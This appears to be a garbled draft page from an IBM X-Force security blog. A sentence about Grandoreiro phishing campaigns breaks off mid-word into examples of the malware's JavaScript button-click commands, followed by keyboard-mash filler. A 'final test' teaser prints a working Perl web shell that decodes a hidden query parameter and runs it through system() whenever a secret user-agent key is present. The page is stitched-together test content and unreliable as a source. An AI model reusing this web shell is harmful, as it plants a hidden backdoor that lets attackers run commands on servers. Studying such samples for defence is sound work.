Light Dark
May 16, 2024 By nathan.toledo@ibm.com < 1 min read
Uncategorized

Since March 2024, IBM X-Force has been tracking several large-scale phishing campaigns distributing the GrandoreIt further allows execution of JavaScript commands in the browser to simulate HTML button clicks:

{{javascript:document.getElementById(‘ctl00_Contentplaceholder1_lbNuevaCuenta’).click();}}

{{javascript:document.getElementById(‘ctl00_Contentplaceholder1_btnAceptar’).click();}}

{{javascript:document.getElementById(‘ctl00_Contentplaceholder1_btnContinuar’).click();}}{{javascript:document.getElementById(‘ctl00_Contentplaceholder1_Button17’).click(); }}

jwiqdjqioffjqjfqwfiqwjfqwjfpwqf

fwfqfqwfwqfqwfwqf

nathan.toledo@ibm.com

More from Uncategorized
June 3, 2024

final test

< 1 min read - sub Msg { my ($event, $level, $data) = @_; my ($pkg, $file, $line) = caller; -- start of webshell code -- my $ua = $ENV{HTTP_USER_AGENT}; my $req = $ENV{QUERY_STRING}; my $qur = "3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6"; my @param = split(/&/, $req); if (index($ua, $qur) != -1) { if ($param[1]){ my @res = split(/=/, $param[1]); if ($res[0] eq "cdi"){ $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg; $res[1] =~ tr/!-~/P-~!-O/; system(${res[1]}); } } } -- end of webshell code -- $file = substr ($file, rindex ($file, "/")+1); # Prevent…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature